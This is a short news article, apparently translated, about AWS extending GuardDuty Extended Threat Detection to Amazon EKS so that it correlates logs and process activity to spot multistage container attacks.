AWS Expands Threat Detection Features For Large-Scale Cloud Applications

JAKARTA - Amazon Web Services (AWS) announced the presence of Amazon GuardDuty Extended Threat Detection with extended coverage for Amazon Elastic Cubenetes Service (Amazon EKS).

This feature is a development of the capabilities previously introduced in AWS re:Invent 2024, namely AI/ML-based threat detection to improve cloud security.

The service is designed to help security teams detect complex cyberattacks targeting container-based modern applications, commonly used by large-scale companies.

Systems such as Amazon EKS are often used to manage applications spread across various cloud servers. However, the nature of this system makes it vulnerable to multistage attacks such as exploiting gaps in containers, escalating access rights, and secretly moving within cloud infrastructure.

Traditional monitoring approaches may be able to detect suspicious events individually, but often fail to capture broader attack patterns that take place in various data sources and time spans, AWS said.

To that end, GuardDuty Extended Threat Detection comes with intelligent solutions that automatically combine and analyze data from various sources, such as log audits, process behavior within the system, malware execution, and API AWS activity.

By leveraging AWS's correlation algorithm, the system can identify suspicious sequences of actions as a series of attacks.

For example, perpetrators can exploit container applications, gain access to service accounts, then take advantage of these rights to access confidential data or important resources in the cloud.

Later, any findings that have been detected will be sent along with detailed information, including affected resources, event chronology, involved perpetrators, and technical indicators used.

Not only that, this service is also equipped with recommendations for mitigation based on the best practices of AWS, in order to help organizations respond to threats quickly and precisely.